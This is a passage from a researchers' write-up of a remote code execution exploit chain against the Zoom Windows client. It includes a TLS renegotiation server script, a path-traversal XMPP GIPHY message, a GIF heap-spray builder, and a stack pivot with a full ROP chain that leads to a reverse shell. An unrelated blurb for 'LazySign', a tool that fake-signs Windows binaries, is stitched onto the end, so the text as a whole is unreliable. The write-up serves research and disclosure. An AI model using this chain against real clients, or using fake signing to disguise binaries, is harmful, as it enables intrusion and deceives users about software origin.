This means that we could leak the pointer we wanted, but in order to do so we needed to place three blocks in the right order in a bucket: the block we overflow, the query part of a URL for an HTTPS request we initiated, and a deallocated TLS1_PRF_PKEY_CTX object. One common way of defeating heap randomization in exploits is to just allocate a lot of objects and try often, but it is not that simple here: we needed enough objects and overflows to have a chance of success, but not so many that no deallocated TLS1_PRF_PKEY_CTX objects would remain. If we allocated too many queries, no TLS1_PRF_PKEY_CTX objects would be left. This was a difficult balance to hit.

We tried this a lot and it took days, but eventually we leaked the address once. Then, a few days later, it worked again. And then again the same day. Slowly we were finding the right balance of the number of objects, connections and overflows.

The @z\x15p (0x70157a40) here is the leaked address in libcrypto-1_1.dll:

One thing that greatly increased the chances of success was to use TLS renegotiation. The TLS1_PRF_PKEY_CTX object is created during a handshake, but setting up new connections takes time and performs a lot of allocations that could disturb our heap bucket. We found that we could set up a connection once and then trigger TLS renegotiation repeatedly, which meant that the handshake was performed again but nothing else. OpenSSL supports renegotiation, and even if you want to renegotiate thousands of times without ever sending an HTTP response, this is entirely fine. We ended up creating 3 connections to a webserver that did nothing other than constantly renegotiate. This gave us a constant stream of freshly deallocated TLS1_PRF_PKEY_CTX objects in the free space of the bucket.
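
A rough sketch of such a renegotiation-only server, assuming the pyOpenSSL bindings and self-provided certificate files (in practice some extra reads may be needed to drive each handshake to completion; we ran three of these connections in parallel):

import socket
from OpenSSL import SSL

ctx = SSL.Context(SSL.TLSv1_2_METHOD)   # renegotiation no longer exists in TLS 1.3
ctx.use_certificate_file("server.crt")  # hypothetical cert/key files
ctx.use_privatekey_file("server.key")

srv = socket.socket()
srv.bind(("0.0.0.0", 443))
srv.listen(1)
raw, _ = srv.accept()

conn = SSL.Connection(ctx, raw)
conn.set_accept_state()
conn.do_handshake()         # initial handshake

while True:
    conn.renegotiate()      # request a new handshake from the client
    conn.do_handshake()     # every handshake creates and frees a
                            # TLS1_PRF_PKEY_CTX on the client side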

The info leak did, however, remain the most unstable part of our exploit. If you watch the video of our exploit, the longest delay is waiting for the info leak. Vincent from ZDI mentions when the info leak happens during the second attempt. As you can see, the rest of the exploit completes quite quickly after that.

Step 11: Control

The next step was to find an object where we could overwrite a vtable or function pointer. Here, again, we found a useful open source component in a DLL. The file viper.dll contains a copy of the WebRTC library from around 2012. Initially, we found that when a call invite is received (even if it is not answered), viper.dll creates 5 objects of 1064 bytes which all start with a vtable. By searching the WebRTC source code we found that these were FileWrapperImpl objects. These can be seen as adding a C++ API around FILE * pointers from C: methods for writing and reading data, automatic closing and flushing in the destructor, and so on. There was one downside: these 5 objects were doing nothing. If we overwrote their vtable in the debugger, nothing happened until we exited Zoom; only then would the destructor call some vtable functions.

class FileWrapperImpl : public FileWrapper {
 public:
  FileWrapperImpl();
  ~FileWrapperImpl() override;

  int FileName(char* file_name_utf8, size_t size) const override;

  bool Open() const override;

  int OpenFile(const char* file_name_utf8,
               bool read_only,
               bool loop = false,
               bool text = false) override;

  int OpenFromFileHandle(FILE* handle,
                         bool manage_file,
                         bool read_only,
                         bool loop = false) override;

  int CloseFile() override;
  int SetMaxFileSize(size_t bytes) override;
  int Flush() override;

  int Read(void* buf, size_t length) override;
  bool Write(const void* buf, size_t length) override;
  int WriteText(const char* format, ...) override;
  int Rewind() override;

 private:
  int CloseFileImpl();
  int FlushImpl();

  std::unique_ptr<RWLockWrapper> rw_lock_;

  FILE* id_;
  bool managed_file_handle_;
  bool open_;
  bool looping_;
  bool read_only_;
  size_t max_size_in_bytes_;  // -1 indicates file size limitation is off
  size_t size_in_bytes_;
  char file_name_utf8_[kMaxFileNameSize];
};

Code execution at exit was far from ideal: it would mean we had just one shot in each attempt. If we failed to overwrite a vtable, we would have no chance to try again. We also did not have a way to remotely trigger a clean exit, and even if we had, the chance that the client could exit successfully was small. The information leak phase will have corrupted many objects and heap metadata by then, which may not affect anything while those objects are unused, but could cause a crash on exit due to destructors or frees.

Based on the WebRTC source code, we noticed that FileWrapperImpl objects are often used in classes related to audio playback. As it happens, the Windows VM Thijs was using at that time did not have an emulated sound card. There had been no need for one, as we were not looking at exploiting the actual meeting functionality. Daan suggested adding one, because it could matter for these objects. Thijs was skeptical, but security involves trying a lot of things you don’t expect to work, so he added one. After this, the creation of FileWrapperImpls had indeed changed significantly.

With an emulated sound card, new FileWrapperImpls were created and destroyed regularly while the call was ringing. Each loop of the jingle seemed to trigger a number of allocations and frees of these objects. It is a shame the videos we have of the exploit do not have sound: you would have heard the ringing sound complete a couple of full loops at the moment it exits and calc is started.

This meant we had a vtable pointer we could overwrite quite reliably, but now the question was: what should we write there?

Step 12: GIPHY time

We had obtained the load address of libcrypto-1_1.dll using our information leak, but we also needed the address of data under our control: if we overwrite a vtable pointer, it needs to point to an area containing one or more function pointers. ASLR means we don’t know for sure where our heap allocations end up. To deal with this, we used GIFs.

To send an out-of-meeting message in Zoom, the receiving user has to have previously accepted a connect request or be in a multi-user chat with the attacker. If a user is able to send a message with an image to another user in Zoom, then that image is downloaded and shown automatically if it is below a few megabytes. If it is larger, the user needs to click on it to download it.

In the Zoom chat client, it is also possible to send GIFs from GIPHY. For these images, the file size restriction is not applied and the files are always downloaded and shown. User uploads and GIPHY files are both downloaded from the same domain, but using different paths. By sending an XMPP message for a GIPHY, but using path traversal in the URL to point it to a user-uploaded GIF file instead, we could trigger the download of arbitrarily sized GIF files. If the file is a valid GIF file, it is loaded into memory. If we send the same link again, it is not downloaded twice, but a new copy is allocated in memory. This is the second low-impact vulnerability we used, which is also fixed according to the Zoom Security Bulletin.

A normal GIPHY message:

<message xmlns="jabber:client" to="[email protected]" id="{62BFB8B6-9572-455C-B440-98F532517177}" type="chat" from="[email protected]/ZoomChat_pc">
  <body>John Doe sent you a GIF image. In order to view it, please upgrade to the latest version that supports GIFs: https://www.zoom.us/download</body>
  <thread>gloox{F1FFE4F0-381E-472B-813B-55D766B87742}</thread>
  <active xmlns="http://jabber.org/protocol/chatstates"/>
  <sns>
    <format>%1$@ sent you an image</format>
    <args>
      <arg>John Doe</arg>
    </args>
  </sns>
  <zmext>
    <msg_type>12</msg_type>
    <from n="John Doe" res="ZoomChat_pc"/>
    <to/>
    <visible>true</visible>
    <msg_feature>16384</msg_feature>
  </zmext>
  <giphyv2 id="YQitE4YNQNahy" url="https://giphy.com/gifs/YQitE4YNQNahy" tags="hacker">
    <pcInfo url="https://file.zoom.us/external/link/issue?id=1::HYlQuJmVbpLCRH1UrxGcLA::aatxNv43wlLYPmeAHSEJ4w::7ZOfQeOxWkdqbfz-Dx-zzununK0e5u80ifybTdCJ-Bdy5aXUiEOV0ZF17hCeWW4SnOllKIrSHUpiq7AlMGTGJsJRHTOC9ikJ3P0TlU1DX-u7TZG3oLIT8BZgzYvfQS-UzYCwm3caA8UUheUluoEEwKArApaBQ3BC4bEE6NpvoDqrX1qX" size="1456787"/>
    <mobileInfo url="https://file.zoom.us/external/link/issue?id=1::0ZmI3n09cbxxQtPKqWbv1g::AmSzU9Wrsp617D6cX05tMg::_Q5mp2qCa4PVFX8gNWtCmByNUliio7JGEpk7caC9Pfi2T66v2D3Jfy7YNrV_OyIRgdT5KJdffuZsHfYxc86O7bPgKROWPxfiyOHHwjVxkw80ivlkM0kTSItmJfd2bsdryYDnEIGrk-6WQUBxBOIpyMVJ2itJ-wc6tmOJBUo9-oCHHdi43Dk" size="549356"/>
    <bigPicInfo url="https://file.zoom.us/external/link/issue?id=1::hA-lI2ZGxBzgJczWbR4yPQ::ZxQquub32hKf5Tle_fRKGQ::TnskidmcXKrAUhyi4UP_QGp2qGXkApB2u9xEFRp5RHsZu1F6EL1zd-6mAaU7Cm0TiPQnALOnk1-ggJhnbL_S4czgttgdHVRKHP015TcbRo92RVCI351AO8caIsVYyEW5zpoTSmwsoR8t5E6gv4Wbmjx263lTi1aWl62KifvJ_LDECBM1" size="4322534"/>
  </giphyv2>
</message>

A GIPHY message with a manipulated path (only the bigPicInfo URL is relevant):

<message xmlns="jabber:client" to="[email protected]" id="{62BFB8B6-9572-455C-B440-98F532517177}" type="chat" from="[email protected]/ZoomChat_pc">
  <body>John Doe sent you a GIF image. In order to view it, please upgrade to the latest version that supports GIFs: https://www.zoom.us/download</body>
  <thread>gloox{F1FFE4F0-381E-472B-813B-55D766B87742}</thread>
  <active xmlns="http://jabber.org/protocol/chatstates"/>
  <sns>
    <format>%1$@ sent you an image</format>
    <args>
      <arg>John Doe</arg>
    </args>
  </sns>
  <zmext>
    <msg_type>12</msg_type>
    <from n="John Doe" res="ZoomChat_pc"/>
    <to/>
    <visible>true</visible>
    <msg_feature>16384</msg_feature>
  </zmext>
  <giphyv2 id="YQitE4YNQNahy" url="https://giphy.com/gifs/YQitE4YNQNahy" tags="hacker">
    <pcInfo url="https://file.zoom.us/external/link/issue?id=1::HYlQuJmVbpLCRH1UrxGcLA::aatxNv43wlLYPmeAHSEJ4w::7ZOfQeOxWkdqbfz-Dx-zzununK0e5u80ifybTdCJ-Bdy5aXUiEOV0ZF17hCeWW4SnOllKIrSHUpiq7AlMGTGJsJRHTOC9ikJ3P0TlU1DX-u7TZG3oLIT8BZgzYvfQS-UzYCwm3caA8UUheUluoEEwKArApaBQ3BC4bEE6NpvoDqrX1qX" size="1456787"/>
    <mobileInfo url="https://file.zoom.us/external/link/issue?id=1::0ZmI3n09cbxxQtPKqWbv1g::AmSzU9Wrsp617D6cX05tMg::_Q5mp2qCa4PVFX8gNWtCmByNUliio7JGEpk7caC9Pfi2T66v2D3Jfy7YNrV_OyIRgdT5KJdffuZsHfYxc86O7bPgKROWPxfiyOHHwjVxkw80ivlkM0kTSItmJfd2bsdryYDnEIGrk-6WQUBxBOIpyMVJ2itJ-wc6tmOJBUo9-oCHHdi43Dk" size="549356"/>
    <bigPicInfo url="https://file.zoom.us/external/link/issue/../../../file/[file_id]" size="4322534"/>
  </giphyv2>
</message>

Our plan was to create a 25 MB GIF file and allocate it multiple times to create a specific address where the data we needed would be placed. Large allocations of this size are randomized when ASLR is used, but these allocations are still page aligned. Because the data we wanted to place was much less than one page, we could just create one page of data and repeat that. This page started with a minimal GIF file, which was enough for the entire file to be considered a valid GIF file. Because Zoom is a 32-bit application, the possible address space is very small. If enough copies of the GIF file are loaded in memory (say, around 512 MB), then we can quite reliably “guess” that a specific address falls inside a GIF file. Due to the page-alignment of these large allocations, we can then use offsets from the page boundary to locate the data we want to refer to.
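
As a sketch, such a spray file can be built as follows (the page offsets and placeholder values are hypothetical; in the real exploit the fake vtable, strings and shellcode correspond to the GIF_BASE offsets listed with the ROP stack in the next step, and the gadget address is filled in after the info leak):

import struct

PAGE = 0x1000

# A minimal valid GIF: header, 1x1 screen with a 2-color palette, a single
# 1x1 image and the trailer. Bytes after the trailer are ignored by the
# parser but still end up in memory.
gif_header = (
    b"GIF89a"
    b"\x01\x00\x01\x00\x80\x00\x00"              # logical screen descriptor
    b"\x00\x00\x00\xff\xff\xff"                  # 2-entry global color table
    b"\x2c\x00\x00\x00\x00\x01\x00\x01\x00\x00"  # image descriptor
    b"\x02\x02\x44\x01\x00"                      # minimal LZW image data
    b"\x3b"                                      # trailer
)

page = bytearray(PAGE)
page[:len(gif_header)] = gif_header

# Hypothetical offsets within the page for the controlled data.
stack_pivot = 0x41414141                         # filled in after the info leak
page[0x1c:0x1c + 64]  = struct.pack("<I", stack_pivot) * 16   # fake vtable
page[0x6c:0x6c + 26]  = "kernel32.dll".encode("utf-16-le") + b"\x00\x00"
page[0x86:0x86 + 15]  = b"VirtualProtect\x00"
page[0x7fd:0x7fd + 4] = b"\xcc\xcc\xcc\xcc"      # shellcode placeholder (int3)

# Repeat the page until the file is 25 MB; every copy the client loads fills
# another chunk of the 32-bit address space with identical, page-aligned data.
with open("spray.gif", "wb") as f:
    f.write(bytes(page) * (25 * 1024 * 1024 // PAGE))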

Step 13: Pivot into ROP

Now we have all the ingredients to call an address in libcrypto-1_1.dll. But to gain arbitrary code execution, we would (probably) need to call multiple functions. For stack buffer overflows in modern software this is commonly achieved using return-oriented programming (ROP). By placing return addresses on the stack to call functions or perform specific register operations, multiple functions can be called sequentially with control over the arguments.

We had a heap buffer overflow, so we could not directly control the stack just yet. The technique we used for this is known as a stack pivot: we replace the stack pointer with a pointer to data we control. We found the following sequence of instructions in libcrypto-1_1.dll:

push edi; # points to vtable pointer (memory we control)
pop esp;  # now the stack pointer points to memory under our control
pop edi;  # pop some extra registers
pop esi; 
pop ebx; 
pop ebp; 
ret

This sequence is misaligned and normally does something else, but for us it could be used to copy the address of data we overwrote (held in edi) into the stack pointer. This means that we replaced the stack with data we wrote using the buffer overflow.

From our ROP chain we wanted to call VirtualProtect to enable the execute bit for our shellcode. However, libcrypto-1_1.dll does not import VirtualProtect, so we did not yet have its address. Raw system calls from 32-bit Windows applications are, apparently, difficult. Therefore, we used the following ROP chain:

  1. Call GetModuleHandleW to get the base address of kernel32.dll.
  2. Call GetProcAddress to get the address of VirtualProtect from kernel32.dll.
  3. Call that address to make the GIF data executable.
  4. Jump to the shellcode offset in the GIF.

In the following animation, you can see how we overwrite the vtable, and then, when Close is called, the stack is pivoted to our buffer overflow. Due to the extra pop instructions in the stack pivot gadget, some unused values are popped. Then the ROP chain starts by calling GetModuleHandleW with the string "kernel32.dll" from our GIF file as its argument. Finally, when that function returns, gadgets are called that place the result value on the stack, where it will serve as the first argument to GetProcAddress. The calling convention in use here means the argument is passed via the stack, right after the return address in our fake stack.

In our exploit this results in the following ROP stack (crypto_base points to the load address of libcrypto-1_1.dll we leaked earlier):

# push edi; pop esp; pop edi; pop esi; pop ebx; pop ebp; ret
STACK_PIVOT = crypto_base + 0x441e9

GIF_BASE = 0x462bc020
VTABLE = GIF_BASE + 0x1c # Start of the correct vtable
SHELLCODE = GIF_BASE + 0x7fd # Location of our shellcode
KERNEL32_STR = GIF_BASE + 0x6c  # Location of UTF-16 Kernel32.dll string
VIRTUALPROTECT_STR = GIF_BASE + 0x86 # Location of VirtualProtect string

KNOWN_MAPPED = 0x2fe451e4

JMP_GETMODULEHANDLEW = crypto_base + 0x1c5c36 # jmp GetModuleHandleW
JMP_GETPROCADDRESS = crypto_base + 0x1c5c3c # jmp GetProcAddress

RET = crypto_base + 0xdc28 # ret
POP_RET = crypto_base + 0xdc27 # pop ebp; ret
ADD_ESP_24 = crypto_base + 0x6c42e # add esp, 0x18; ret

PUSH_EAX_STACK = crypto_base + 0xdbaa9 # mov dword ptr [esp + 0x1c], eax; call ebx
POP_EBX = crypto_base + 0x16cfc # pop ebx; ret
JMP_EAX = crypto_base + 0x23370 # jmp eax

rop_stack = [
    VTABLE,              # pop edi
    GIF_BASE + 0x101f4,  # pop esi
    GIF_BASE + 0x101f4,  # pop ebx
    KNOWN_MAPPED + 0x20, # pop ebp
    JMP_GETMODULEHANDLEW,
    POP_EBX,
    KERNEL32_STR,

    ADD_ESP_24,
    PUSH_EAX_STACK,
    0x41414141,
    POP_RET,             # Not used, padding for other objects
    0x41414141,
    0x41414141,
    0x41414141,
    JMP_GETPROCADDRESS,
    JMP_EAX,
    KNOWN_MAPPED + 0x10, # GetProcAddress arg 1: overwritten with the base address of kernel32.dll
    VIRTUALPROTECT_STR,  # GetProcAddress arg 2: the string "VirtualProtect"
    SHELLCODE,           # return address for VirtualProtect: the shellcode itself
    SHELLCODE & 0xfffff000, # VirtualProtect lpAddress: the page containing the shellcode
    0x1000,              # VirtualProtect dwSize: one page
    0x40,                # VirtualProtect flNewProtect: PAGE_EXECUTE_READWRITE
    SHELLCODE - 8,       # VirtualProtect lpflOldProtect: any writable address
]

And that’s it! We now had a reverse shell and could launch calc.exe.

Reliability, reliability, reliability

The last week before the contest was focused on getting the exploit to an acceptable level of reliability. As mentioned in the info leak section, that phase was very tricky. It took a lot of time to get it to a point where it had even a tiny chance of succeeding. We had to overwrite a lot of data, while the application had to remain stable enough that we could still perform the second phase without crashing.

There were a lot of things we did to improve the reliability and many more we tried and gave up. These can be summarized in two categories: decreasing the chance that we overwrote something we shouldn’t and decreasing the chance that the client would crash when we had overwritten something we didn’t intend to.

In the second phase, it could happen that we overwrote the vtable of a different object. Whenever we had a crash like this, we would try to fix it by placing a compatible no-op function at the corresponding place in the vtable. This is harder than it sounds on 32-bit Windows, because multiple calling conventions are involved and some require the RET instruction to pop the arguments from the stack, which means we needed a no-op that pops the right number of values.

In the first phase, we also had a chance of overwriting pointers in objects in the same size range. We could not yet deal with function pointers or vtables as we had no info leak, but we could place pointers to readable/writable memory. We started our exploit by uploading some GIF files to create known addresses with controlled data before this phase so we could use those addresses in the data we used for the overflow. Of course, the data in the GIF files could again be dereferenced as a pointer, requiring multiple layers of fake addresses.

What may not yet be clear is that each attempt required a slow manual process. Each time we wanted to run our exploit, we would launch the client, clear all chat messages for the victim, exit the client and launch it again. Because the memory layout was so important, we had to make sure we started from an identical state each time. We had not automated this, because we were paranoid about ensuring the client would be used in exactly the same way as during the contest. Anything we did differently could influence the heap layout. For example, we noticed that adding network interception could have some effect on how network requests were allocated, changing the heap layout. Our attempts were often close to 5 minutes, so even just doing 10 attempts took an hour. To assess if a change improved the reliability, 10 runs was pretty low.

Both the info leak and the vtable overwrite phase run in loops. If we were lucky, we had success in the first iteration of the loop, but it could go on for a long time. To improve our chance of success in the time limit, our exploit would slowly increase the risk it took the more iterations it needed. In the first iteration we would only overflow a small number of times and only one object, but this would increase to more and more overflows with larger sizes the longer it took.
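
As an illustration, the escalation schedule looked roughly like this (the concrete numbers are made up; only the shape, starting small and ramping up, matches what we did):

# Illustrative escalation: take more risk the longer the loop runs.
for iteration in range(1, 11):
    overflow_attempts   = iteration             # how often we trigger the overflow
    objects_per_attempt = 1 + iteration // 3    # how many blocks we overflow at once
    overwrite_size      = 1088 + 64 * iteration # how far we write past the buffer
    print(f"round {iteration:2d}: {overflow_attempts} overflows, "
          f"{objects_per_attempt} objects, {overwrite_size} bytes")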

In the second phase we could take more risks. The application did not need to remain stable enough for another phase and we only needed two adjacent allocations, not also a third unallocated block. By overwriting 10 blocks further, we had a very good chance of hitting the needed object with just one or two iterations.

In the end, we estimated that our exploit had about a 50% chance of success within the 5 minutes. If, on the other hand, we could leak the address of libcrypto-1_1.dll in one run and then skip the info leak in the next run (the locations of ASLR-randomized DLLs remain the same on Windows for some time), we could increase our reliability to around 75%. ZDI informed us during the contest that this would result in a partial win, but it never got to the point where we could do that: the first attempt failed in the first phase.

Conclusion

After we handed in our final exploit the nerve-wracking process of waiting started. Since we needed to hand in our final exploit two days before the event and the organizers would not run our exploit until our attempt, it was out of our hands. Even during the attempts we could not see the attacker’s screen, for example, so we had no idea if everything worked as planned. The enormous relief when calc.exe popped up made it worth it in the end.

In total we spent around 1.5 weeks from the start of our research until we had the main vulnerability for our exploit. Writing and testing the exploit itself took another 1.5 months, including the time needed to read up on all the Windows internals required for our exploit.

We would like to thank ZDI and Zoom for organizing this year’s event, and hopefully see you guys next year!

LazySign - Create Fake Certs For Binaries Using Windows Binaries And The Power Of Bat Files


Create fake certs for binaries using windows binaries and the power of bat files

Over the years, several cool tools have been released that are capable of stealing or forging fake signatures for binary files. All of these tools, however, have additional dependencies which require Go, Python, ...


This repo gives you the ability to fake-sign binaries with 0 additional dependencies; all of the binaries used are part of Microsoft's own devkits. I took the liberty of writing a bat file to make things easy.

So if you are lazy like me, just clone the git, run the bat, follow the instructions and enjoy your new fake-signed binary. With some adjustments it could even be used to sign using valid certs as well ¯\_(ツ)_/¯


